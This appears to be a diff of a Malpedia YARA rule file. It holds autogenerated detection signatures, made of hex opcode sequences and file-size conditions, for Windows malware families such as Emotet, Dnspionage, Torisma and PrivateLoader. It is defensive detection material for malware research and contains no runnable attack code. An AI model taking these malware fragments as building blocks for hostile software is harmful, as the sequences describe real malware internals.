+		$sequence_25 = { ffd7 59 5f 5e c3 8b4c2404 85c9 }
+		$sequence_26 = { e8???????? 59 5e 83f8ff }
+		$sequence_27 = { 6a01 ff15???????? 8bf0 59 59 3bf7 }
+		$sequence_28 = { 8b4514 893e 897e04 894608 c7460c7f000000 }
+		$sequence_29 = { 8d45f0 50 ff758c e8???????? 0fb606 }
+		$sequence_30 = { 00db 7313 752f 3b742404 0f830b010000 }
+		$sequence_31 = { 58 8b542408 85d2 7407 }
+		$sequence_32 = { 8b4d14 57 894628 894e08 e8???????? }
+		$sequence_33 = { 740a b8???????? e9???????? 56 be3412cdab }
+		$sequence_34 = { 52 ff5640 85c0 0f8464010000 8b8690000000 }
+		$sequence_35 = { 83f8ff 7446 8d85d8feffff 50 57 e8???????? }
+		$sequence_36 = { 6a03 50 e8???????? 83c414 eb19 8b570c }
+		$sequence_37 = { 83c40c 85c0 7409 83f8fc 0f85af000000 8b45e8 }
+		$sequence_38 = { e8???????? 83c40c c3 8b542404 8b4c2408 56 }
+		$sequence_39 = { 00db 7313 75e1 3b742404 0f8318010000 }
+		$sequence_40 = { c1ee08 8b75fc 885001 8bd1 0facf210 c1ee10 885002 }
+		$sequence_41 = { 00db 73e1 7511 3b742404 }
+		$sequence_42 = { 8975f8 8975e8 8975d0 8975dc }
+		$sequence_43 = { 00db 7309 75f4 8a1e 46 10db }
+		$sequence_44 = { 8b35???????? 33db 53 6a04 8d45dc 50 57 }
+		$sequence_45 = { 50 ff7508 ff15???????? 83f8ff 741f 56 }
+		$sequence_46 = { 8bf0 59 59 85f6 7423 ff75f0 }
+		$sequence_47 = { 33c0 83c008 57 8b7d10 50 8907 894704 }
+		$sequence_48 = { 50 52 ff5624 85c0 0f84d2010000 31c0 50 }
+		$sequence_49 = { 660fb64901 66c1e008 660bc1 c3 }
+		$sequence_50 = { 51 d91c24 e8???????? 50 e8???????? d905???????? }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 491520
 }
-rule MALPEDIA_Win_Dnspionage_Auto : FILE
+rule MALPEDIA_Win_Wmighost_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c7c60f8b-ffeb-567c-be45-7a70df2627af"
+		id = "4ae59171-3faf-5182-8f52-dee99c964f8d"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dnspionage_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wmighost"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.wmighost_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "9f5e6f058799877afad32a21b9b0391ec6d411b2fe63c92bd1ec8e1ea4cf6242"
+		logic_hash = "e0508af85bc342ca28af7aa1d71f7f0ca199aee7b1652eae79524bd3a3802f63"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109698,32 +109916,32 @@ rule MALPEDIA_Win_Dnspionage_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c408 2bdf 78cc 8d4301 50 e8???????? 83c404 }
-		$sequence_1 = { eb52 8d0492 8d144503000000 eb46 8d0492 }
-		$sequence_2 = { 894dfc 57 8bfa 85f6 0f8487000000 }
-		$sequence_3 = { 7ed9 53 ff15???????? 8b4dfc }
-		$sequence_4 = { 8d4d0c ba???????? 51 8d4df4 51 8bc8 }
-		$sequence_5 = { e8???????? 8b4de4 83c404 33f6 8945e8 }
-		$sequence_6 = { e8???????? 8b450c 83c404 83f8ff 7503 50 }
-		$sequence_7 = { 897dfc 85f6 7508 5f 33c0 5e 8be5 }
-		$sequence_8 = { 8bf2 2bf9 8d4e01 6690 }
-		$sequence_9 = { 8b4ddc 85db 0f8563ffffff 8975f0 85f6 0f84a0000000 8bc6 }
+		$sequence_0 = { e8???????? 83c408 68???????? 8d8df0fcffff 51 }
+		$sequence_1 = { 8a15???????? 33ca 8b45f8 8888c8304000 ebb0 c745fc???????? }
+		$sequence_2 = { f3ab 66ab aa c6858caeffff00 b9ff090000 }
+		$sequence_3 = { c3 55 8bec 83ec08 894df8 8b4508 50 }
+		$sequence_4 = { 8945f0 837df000 7d12 68???????? 8b45ec }
+		$sequence_5 = { 52 8d85f0fcffff 50 e8???????? 83c408 68???????? }
+		$sequence_6 = { 8a0d???????? 33c1 8b55f8 8882c8304000 8b45f8 0fbe88c8304000 33d2 }
+		$sequence_7 = { 50 ff5238 8945fc 837dfc00 7d12 68???????? }
+		$sequence_8 = { 8bec 83ec08 894df8 668b4508 50 }
+		$sequence_9 = { 8b45b4 8945b0 c645fc04 8d4de8 }
 
 	condition:
-		7 of them and filesize < 786432
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Yayih_Auto : FILE
+rule MALPEDIA_Win_Bistromath_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6b0b123b-a2d0-5239-b990-6d6c98b897d2"
+		id = "e2ace9ec-fb28-5f7e-b65b-e020bfa94a6f"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.yayih_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bistromath"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.bistromath_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "2fc47407627eaa9d0405e17fbf6ef6d14584c29b56705d065c0a11f1cb55f981"
+		logic_hash = "8b0190b62dedacf36599f0042a8bd29edc86ceda9086cf91a756283776411b62"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109731,40 +109949,40 @@ rule MALPEDIA_Win_Yayih_Auto : FILE
 		tool = "yara-signator v0.6.0"
 		signator_config = "callsandjumps;datarefs;binvalue"
 		malpedia_rule_date = "20241030"
-		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
-		malpedia_version = "20241030"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { ff35???????? ff15???????? 85c0 0f8442050000 8b45dc }
-		$sequence_1 = { 59 7510 8d85bcd8ffff 50 56 ff75fc }
-		$sequence_2 = { 898574ffffff ffd7 8bf8 56 2b7dd8 }
-		$sequence_3 = { 8d85bcd8ffff 50 e8???????? 59 8d8dbcd8ffff 83e903 803c0829 }
-		$sequence_4 = { 6a01 53 c745c464000000 895dfc 895de4 895df0 895df4 }
-		$sequence_5 = { 50 56 6a63 e8???????? 83c414 }
-		$sequence_6 = { 895dcc a4 ff15???????? 3bc3 898578ffffff 0f8465110000 ff15???????? }
-		$sequence_7 = { 752c 3975dc 7554 3975cc 754f }
-		$sequence_8 = { ff15???????? ff35???????? ff15???????? ff35???????? ff15???????? 807dd16b 741d }
-		$sequence_9 = { 59 59 50 57 ffd6 a3???????? eb54 }
+		malpedia_hash = "26e26953c49c8efafbf72a38076855d578e0a2e4"
+		malpedia_version = "20241030"
+		malpedia_license = "CC BY-SA 4.0"
+		malpedia_sharing = "TLP:WHITE"
+
+	strings:
+		$sequence_0 = { e8???????? 8bd8 85db 750a 8b45f8 c6400505 88580f }
+		$sequence_1 = { 8bcb e8???????? 8b8318020000 8a08 84c9 740b 80f93b }
+		$sequence_2 = { f30f7e44c748 660fd641f8 83ea01 75c0 8b7c2464 8b742470 eb07 }
+		$sequence_3 = { 8b4e04 85c9 740b 8b461c 8d0480 c64481ef08 8b45a8 }
+		$sequence_4 = { e8???????? 85c0 0f84fb010000 e9???????? 0fb645fe 3bf0 0f852a010000 }
+		$sequence_5 = { 8b97a0000000 8bcf e8???????? 8b879c000000 8b4df8 89b7a0000000 890c86 }
+		$sequence_6 = { ffd6 85c0 7407 bb01000000 eb18 a1???????? 85c0 }
+		$sequence_7 = { ff15???????? 85c0 0f8504ffffff ffb57cf5ffff ff15???????? 8b4df8 5f }
+		$sequence_8 = { e9???????? 55 8bec 83ec08 56 8b713c 8b06 }
+		$sequence_9 = { c7421000000000 e8???????? 85f6 746d 83bb0002000000 7435 3bb30c010000 }
 
 	condition:
-		7 of them and filesize < 57344
+		7 of them and filesize < 33816576
 }
-rule MALPEDIA_Win_Emotet_Auto : FILE
+rule MALPEDIA_Win_Torisma_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "85da1a2d-a5c5-5b7b-9770-0decc7a1a09c"
+		id = "0c8b0e1d-5ff0-52a0-901d-e5a98754d385"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.emotet"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.emotet_auto.yar#L1-L629"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.torisma_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "833ebe5d59874650225701086c74088b08c5f926b449dc8bc3e0d02e1708d1c4"
+		logic_hash = "5f2db125f988ab78c395c9bd2de9be120817934423d4d9849c1bfeec7d230b1e"
 		score = 75
-		quality = 50
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -109776,98 +109994,35 @@ rule MALPEDIA_Win_Emotet_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8a01 3c30 7c04 3c39 7e13 3c61 7c04 }
-		$sequence_1 = { 7e0b 3c41 7c04 3c5a 7e03 c60158 }
-		$sequence_2 = { 7e13 3c61 7c04 3c7a 7e0b 3c41 }
-		$sequence_3 = { 33c0 3903 5f 5e 0f95c0 5b 8be5 }
-		$sequence_4 = { 3c5a 7e03 c60158 41 803900 75dd }
-		$sequence_5 = { 83c020 eb03 0fb7c0 69d23f000100 }
-		$sequence_6 = { 8bc1 c1e808 8d5204 c1e910 8842fd 884afe c1e908 }
-		$sequence_7 = { 7416 6683385c 740a 83c002 }
-		$sequence_8 = { 75f2 eb06 33c9 66894802 }
-		$sequence_9 = { 8d5801 f6c30f 7406 83e3f0 }
-		$sequence_10 = { 0faf4510 50 6a08 ff15???????? }
-		$sequence_11 = { 8b477c 85c0 7448 8b00 2b878c000000 }
-		$sequence_12 = { 03c7 56 50 8b4774 03878c000000 50 ff15???????? }
-		$sequence_13 = { 83c40c 8b4d0c 8bc2 0bc1 }
-		$sequence_14 = { 03878c000000 50 ff15???????? 017758 83c40c 29775c }
-		$sequence_15 = { 8b780c 8bd9 83c70c 8b37 }
-		$sequence_16 = { 8b4604 8b16 8945fc 8d45f8 6a04 50 }
-		$sequence_17 = { 81ca00000020 50 52 51 }
-		$sequence_18 = { c745fc04000000 50 8d45f8 81ca00000020 50 }
-		$sequence_19 = { 483bd8 730b 488bcb e8???????? 488bd8 }
-		$sequence_20 = { 66c1e908 418848ff 4d3bd9 72cf }
-		$sequence_21 = { 48895010 4c894018 4c894820 c3 }
-		$sequence_22 = { 2bca d1e9 03ca c1e906 894d20 }
-		$sequence_23 = { 488bd3 488bcf 488b5c2460 4883c450 }
-		$sequence_24 = { 0fb7c1 c1e910 66c1e808 4d8d4004 418840fd 418848fe }
-		$sequence_25 = { 418bd0 d3e2 418bcb d3e0 03d0 }
-		$sequence_26 = { d3e7 83f841 7208 83f85a }
-		$sequence_27 = { 4c8bdc 49895b08 49896b10 49897318 49897b20 4156 4883ec70 }
-		$sequence_28 = { c1e807 46 83f87f 77f7 }
-		$sequence_29 = { f7e1 b84fecc44e 2bca d1e9 }
-		$sequence_30 = { 84c0 75f2 eb03 c60100 }
-		$sequence_31 = { 83c104 894e04 8b00 85c0 }
-		$sequence_32 = { 0fb6c0 668942fa c1e910 0fb6c1 }
-		$sequence_33 = { 7907 83c107 3bf7 72e8 }
-		$sequence_34 = { 56 57 6a1e 8d45e0 }
-		$sequence_35 = { 52 52 52 68???????? 52 }
-		$sequence_36 = { 83ec48 53 56 57 6a44 }
-		$sequence_37 = { 83f87f 760d 8d642400 c1e807 }
-		$sequence_38 = { b901000000 83f87f 7609 c1e807 }
-		$sequence_39 = { 7609 c1e807 41 83f87f }
-		$sequence_40 = { 6a00 6aff 50 51 ff15???????? }
-		$sequence_41 = { 68400000f0 6a18 33f6 56 }
-		$sequence_42 = { 83ec08 56 68400000f0 6a18 }
-		$sequence_43 = { 6a00 ff75fc 6800040000 6a00 6a00 }
-		$sequence_44 = { 53 56 8bf1 bb00c34c84 }
-		$sequence_45 = { 50 56 6800800000 6a6a }
-		$sequence_46 = { 31d2 f7f1 8b0d???????? 8a1c11 }
-		$sequence_47 = { 8d0492 89ca 29c2 89d0 }
-		$sequence_48 = { 01c1 8b55f4 8b0402 83f800 }
-		$sequence_49 = { 6a03 6a00 6a00 ff7508 53 50 }
-		$sequence_50 = { 8b466c 5f 5e 5b 8be5 5d }
-		$sequence_51 = { 8bf1 bb00c34c84 57 33ff }
-		$sequence_52 = { 01ca 89d6 83c604 8b7de0 8b4c0f04 83f900 }
-		$sequence_53 = { 01ca 89d6 83c60c 8b7df4 8b4c0f0c }
-		$sequence_54 = { 83ec10 53 6a00 8d45fc }
-		$sequence_55 = { 8d4df8 51 ff75f8 50 6a03 6a30 }
-		$sequence_56 = { 55 8bec 83ec08 56 57 8bf1 33ff }
-		$sequence_57 = { 8b7020 8b7840 89c3 83c33c }
-		$sequence_58 = { 743e 8b5c2430 85db 741d }
-		$sequence_59 = { 33d2 c605????????00 0fb6d8 e8???????? }
-		$sequence_60 = { 8bf8 e8???????? eb04 8b7c2430 }
-		$sequence_61 = { e8???????? 84c0 7519 33c9 0f1f4000 }
-		$sequence_62 = { 31c9 89e2 31f6 89720c }
-		$sequence_63 = { 31f6 89720c 897208 897204 }
-		$sequence_64 = { ff15???????? 83f803 7405 83f802 751e }
-		$sequence_65 = { e8???????? 488d1527400000 41b804010000 8b4850 890d???????? 33c9 }
-		$sequence_66 = { 83c310 89542454 894c2450 895c244c }
-		$sequence_67 = { 8b1f 8bac2484000000 8b7d00 8b6c2478 01fd 89442438 8b442478 }
-		$sequence_68 = { 8d95fcfeffff 52 e8???????? 8db5fcfeffff }
-		$sequence_69 = { 488d15c6220000 488bcb ff15???????? 85c0 7528 }
-		$sequence_70 = { 5b c3 8b442408 8b0c850440d800 8b542410 }
-		$sequence_71 = { 48 895c2450 90 8b0f 48 8d15b71f0000 }
-		$sequence_72 = { 0f28ca f20f11942480000000 f20f114c2458 89442454 }
-		$sequence_73 = { 48 8d0d73440000 48 8bd3 48 83c440 }
-		$sequence_74 = { 83c101 8b542414 83c228 8b742468 }
-		$sequence_75 = { 0f84c0000000 488d542430 488bc8 4889742470 e8???????? 488bf0 }
+		$sequence_0 = { 7402 eb05 e9???????? b833280000 }
+		$sequence_1 = { e8???????? 3d514b0000 7504 33c0 }
+		$sequence_2 = { e8???????? 3d83490000 7507 b883490000 }
+		$sequence_3 = { 4889442458 488b442458 4889442430 488b4c2430 e8???????? }
+		$sequence_4 = { 50 ff15???????? 8b4dfc 51 6a40 ff15???????? 8945f8 }
+		$sequence_5 = { c1e91b 83e101 33d1 8b4508 8b4878 }
+		$sequence_6 = { 8b55f4 52 8b4da4 e8???????? }
+		$sequence_7 = { 83e101 c1e102 8b9424bc000000 0bd1 }
+		$sequence_8 = { 837c246800 740a 8b442430 89442438 eb08 }
+		$sequence_9 = { 89442430 488b442450 8b404c 83e001 }
+		$sequence_10 = { 817df404810200 760a b8514b0000 e9???????? 8b45f4 }
+		$sequence_11 = { b862000000 668945d2 b962000000 66894dd4 ba30000000 }
+		$sequence_12 = { 48894c2408 57 4881ecb0000000 48c7842488000000feffffff }
 
 	condition:
-		7 of them and filesize < 733184
+		7 of them and filesize < 322560
 }
-rule MALPEDIA_Win_Misha_Auto : FILE
+rule MALPEDIA_Win_Gearshift_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ae44f4ed-6b62-5739-afcc-3910b944ad53"
+		id = "00cf566b-9374-5def-8d2f-a72e86672548"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.misha"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.misha_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gearshift"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.gearshift_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "6808e3992c1a57c6f785e40da9dc7940883a56816b3304928fa690c0fc154801"
+		logic_hash = "917aa162d8155114b467928aa78b546e741372aa2ec73d46169e5f3309d74a6b"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109881,32 +110036,32 @@ rule MALPEDIA_Win_Misha_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? ff7508 8d45e8 50 e8???????? 83c414 eb02 }
-		$sequence_1 = { 8b45b8 8945c0 8b45b8 8945c8 c645df01 eb04 c645df01 }
-		$sequence_2 = { eb04 8b542410 0fb64c240c 8bc1 4a 48 7422 }
-		$sequence_3 = { a5 a5 8b450c c780f800000004000000 8b450c c780f400000001000000 }
-		$sequence_4 = { c3 55 8bec 81ec10020000 ff750c }
-		$sequence_5 = { eb43 837d1400 7421 ff7518 ff7514 ff7510 }
-		$sequence_6 = { 397d0c 7456 57 57 ff750c ff7508 }
-		$sequence_7 = { 2b4508 f7d8 48 e9???????? 837d1800 7419 }
-		$sequence_8 = { c78550feffff18181818 c78554feffff18181818 c78558feffff18181819 c7855cfeffff19191919 c78560feffff19191919 c78564feffff19191919 c78568feffff19191919 }
-		$sequence_9 = { ff75dc 6a08 59 e8???????? 83c420 0fb6c0 85c0 }
+		$sequence_0 = { 41bb00020000 4c8d0d11a2ffff 458a20 4584e4 0f8547f9ffff 44385598 740b }
+		$sequence_1 = { 664189844888b40300 ffc2 ebe2 8bd7 89542420 }
+		$sequence_2 = { 85c0 0f8565010000 488d4c2424 33d2 }
+		$sequence_3 = { 85c0 750d 8b442428 ffc6 4883c304 }
+		$sequence_4 = { 488bcb 48894550 ff15???????? 48894558 48397548 }
+		$sequence_5 = { 498bcc e8???????? 85c0 750d }
+		$sequence_6 = { 41b800100000 4c896008 4c897810 4c897818 418b5550 498bcc }
+		$sequence_7 = { ff96b0000000 85c0 0f8408ffffff 488b4500 48ba00000000ffffffff 488b7830 0fb74814 }
+		$sequence_8 = { c6858000000000 e8???????? 4c8d442438 418bd7 }
+		$sequence_9 = { 488bc8 ff15???????? 4885c0 7449 488d4df7 }
 
 	condition:
-		7 of them and filesize < 710656
+		7 of them and filesize < 540672
 }
-rule MALPEDIA_Win_Newcore_Rat_Auto : FILE
+rule MALPEDIA_Win_Graphsteel_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1da70a7f-a318-54ce-916c-cf7245c92f4f"
+		id = "ee773efd-abc9-59ea-a8a9-5d1bcd00ab52"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.newcore_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.newcore_rat_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.graphsteel"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.graphsteel_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "4e9038b9cb3dfc5a1f725a1c7c7f2099a8bbce01f729092f2f2495b7d4912fe0"
+		logic_hash = "c16b3aee4470d6b80d6571382358ae60606e1bc85c16a98c39f469be44f26ba8"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -109920,34 +110075,34 @@ rule MALPEDIA_Win_Newcore_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f841b010000 8b4c2418 03c8 03f8 2bd8 3b4c241c }
-		$sequence_1 = { 85c0 7534 8d442414 50 8d4c241c e8???????? }
-		$sequence_2 = { e8???????? 83c414 ebc9 8bc8 c1f905 8d1c8dc0cd0310 8bf0 }
-		$sequence_3 = { 68???????? 8d96f6010000 e8???????? 8b442434 8b4c2438 }
-		$sequence_4 = { 8d54242c 52 8d4c2418 8984245c020000 e8???????? 8d44242c }
-		$sequence_5 = { 5d 5b c3 8b8e58300000 03c0 03c0 898678300000 }
-		$sequence_6 = { 80c130 83e20f 884804 8bca 83f909 7e05 }
-		$sequence_7 = { 8984245c020000 e8???????? 8d44242c 50 8d742444 e8???????? 8b00 }
-		$sequence_8 = { ff15???????? 57 8bf0 53 56 ff15???????? 56 }
-		$sequence_9 = { 8bb42450020000 8bd8 8b442418 50 6a32 8d7b34 b904010000 }
+		$sequence_0 = { e8???????? e9???????? 4c89642420 ba12000000 4531c9 4c89e9 4c8d05e9604900 }
+		$sequence_1 = { e8???????? 4889442458 48895c2428 488d0537c74200 e8???????? 48c7400810000000 48c7401010000000 }
+		$sequence_2 = { e8???????? 89442458 e9???????? 83c301 4d8d5760 4d8b5f38 4c89f1 }
+		$sequence_3 = { c784240001000000000000 48895c2438 8b5c2430 4c89e9 448d6301 4489e2 e8???????? }
+		$sequence_4 = { e9???????? 4889d0 4889d9 e8???????? 4889d0 4889d9 e8???????? }
+		$sequence_5 = { e8???????? 488b6c2470 4883c478 c3 488d05d4323a00 488d1dad9f4a00 e8???????? }
+		$sequence_6 = { e8???????? 488d05fbc53800 488d1db4334900 e8???????? 488d05e8c53800 488d1da1334900 90 }
+		$sequence_7 = { e8???????? 89442444 4189c1 85c0 0f8423020000 488b442448 4885c0 }
+		$sequence_8 = { e8???????? 48ffc2 4839d3 7e14 761a 0fb63410 6690 }
+		$sequence_9 = { bf01000000 4889d6 e8???????? 488b4c2470 488b742450 488b542448 eb39 }
 
 	condition:
-		7 of them and filesize < 581632
+		7 of them and filesize < 19812352
 }
-rule MALPEDIA_Win_Ccleaner_Backdoor_Auto : FILE
+rule MALPEDIA_Win_Privateloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d39b3ad8-e53b-51c7-9c43-1241d438c62d"
+		id = "d996c731-cbb3-50a4-93a5-b71789f95831"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.ccleaner_backdoor_auto.yar#L1-L273"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.privateloader_auto.yar#L1-L184"
 		license_url = "N/A"
-		logic_hash = "7e02daa93489db738904f39e35741a7860a222dd47acd23737d3bf7b398eab73"
+		logic_hash = "b3bd260ff9676412911b82f7ca10842c721430b21d232272a50e615d0d279a78"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -109959,52 +110114,41 @@ rule MALPEDIA_Win_Ccleaner_Backdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 57 ffd6 50 ff15???????? 8b3d???????? 59 ffd7 }
-		$sequence_1 = { 750a b857000780 e9???????? e8???????? }
-		$sequence_2 = { 6a10 50 c785fcfdffff1c7bae7b c78500feffff5c5aae93 }
-		$sequence_3 = { 00cc cc 4883ec28 488b11 }
-		$sequence_4 = { eb03 8b5d0c 8a41fe 83e003 }
-		$sequence_5 = { 013d???????? 8b04b5d8970210 0500080000 3bc8 }
-		$sequence_6 = { 01cc cc 48895c2408 57 }
-		$sequence_7 = { c746182cc60210 eb28 83f8fc 7426 }
-		$sequence_8 = { 01442418 03c8 8954242c 8b542470 }
-		$sequence_9 = { 48 83f808 0f8ceafeffff eb12 }
-		$sequence_10 = { 01442424 eb30 8b4508 897518 }
-		$sequence_11 = { 01461c 8b542424 85d2 7405 }
-		$sequence_12 = { 00cc cc 4057 4883ec50 4533db }
-		$sequence_13 = { c70609000000 c7471870b30210 8b4508 894620 8b450c 89461c 8b45fc }
-		$sequence_14 = { ff75e8 8bf8 e8???????? 59 ff75fc ff15???????? }
-		$sequence_15 = { 03c0 894340 8b7340 418bc4 }
-		$sequence_16 = { ff15???????? 8b45f0 0500a30200 50 e8???????? 3bfb 59 }
-		$sequence_17 = { 6af9 2b5510 8b4d14 58 8911 5f 5e }
-		$sequence_18 = { 01442454 03d1 294c2450 8b4c2410 }
-		$sequence_19 = { 6a04 50 8d45d0 6a04 50 8d85d0feffff 50 }
-		$sequence_20 = { 837dfc02 0f877b010000 c1e802 8d4c40fd }
-		$sequence_21 = { 48 8bce 49 8d4002 48 }
-		$sequence_22 = { 03c6 85c0 7f09 488b0a 488b01 ff5008 488b4b28 }
-		$sequence_23 = { 6a14 50 c745e01d3b395c c745e4aeacefc4 c745e885230f62 c745ec45a5940f }
-		$sequence_24 = { 7411 8b5204 85d2 740a 833900 7405 833a00 }
-		$sequence_25 = { 013e 33c0 8b16 83c410 }
-		$sequence_26 = { 03c6 4863d0 4c8d0c12 4c8d4718 }
-		$sequence_27 = { 01460c 488b3f 493bfc 0f8554ffffff }
-		$sequence_28 = { 012e 33c0 5f 5e 5d }
-		$sequence_29 = { c70309000000 c746183cb40210 ebc9 8b450c 894720 }
+		$sequence_0 = { 8945e4 8b4d08 51 0fbe550c }
+		$sequence_1 = { 66894c5002 eb19 33d2 8855ff 0fb74508 50 0fb64dff }
+		$sequence_2 = { 8b4dfc c7417c50000000 eb3c 837d080b }
+		$sequence_3 = { 894de0 8b45e0 8945e8 8b4de8 8b5110 8955ec 8b4de0 }
+		$sequence_4 = { 894de0 8b5508 8955fc 8b45fc }
+		$sequence_5 = { 8b45d8 8b4ddc 8b55d0 8b75d4 }
+		$sequence_6 = { 894de0 8b55e0 8955dc 8b45f0 }
+		$sequence_7 = { 8b4210 2b4508 8945f4 8b4df4 }
+		$sequence_8 = { e8???????? 33d2 b93f000000 f7f1 }
+		$sequence_9 = { 896c2404 8bec 81ec68010000 a1???????? 33c5 8945fc 56 }
+		$sequence_10 = { 8b4590 8b4d94 8b5588 8b758c }
+		$sequence_11 = { e8???????? 6bc007 33c9 41 c1e102 }
+		$sequence_12 = { 56 ff15???????? a3???????? 33c0 5e c3 3b0d???????? }
+		$sequence_13 = { c9 b8ffffffff 99 c3 56 8b35???????? 8bce }
+		$sequence_14 = { 83c201 8955e0 83d600 8975e4 }
+		$sequence_15 = { 51 6a00 6813000020 50 }
+		$sequence_16 = { 8b45e4 50 51 52 }
+		$sequence_17 = { 0bc8 56 57 7529 }
+		$sequence_18 = { 8bf0 e8???????? 8bc8 8bfa 8bc6 }
 
 	condition:
-		7 of them and filesize < 377856
+		7 of them and filesize < 3670016
 }
-rule MALPEDIA_Win_Http_Troy_Auto : FILE
+rule MALPEDIA_Win_Shady_Hammock_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ce73b438-aadd-590a-8f29-6294af71df05"
+		id = "36740afa-cc52-5013-823b-4d67eb5edc24"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.http_troy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.http_troy_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shady_hammock"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.shady_hammock_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "0940e5bc37e1b157bd6ecfd92ed3054d2dd55689c30354c0593d0b04427adfc7"
+		logic_hash = "fa878708757191f1b63841f4404f6fa30ea9e29c95ad0fe726f8dc83ae6686cd"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110018,32 +110162,32 @@ rule MALPEDIA_Win_Http_Troy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 56 57 89842434010000 33c0 c644242800 b940000000 }
-		$sequence_1 = { f6c405 7a17 83f901 7508 dd05???????? eb02 d9ee }
-		$sequence_2 = { 8b18 56 8b750c 3bf7 0f84b9000000 807e0800 0f84af000000 }
-		$sequence_3 = { 75f6 8d842458010000 8d5001 8a08 40 3acb 75f9 }
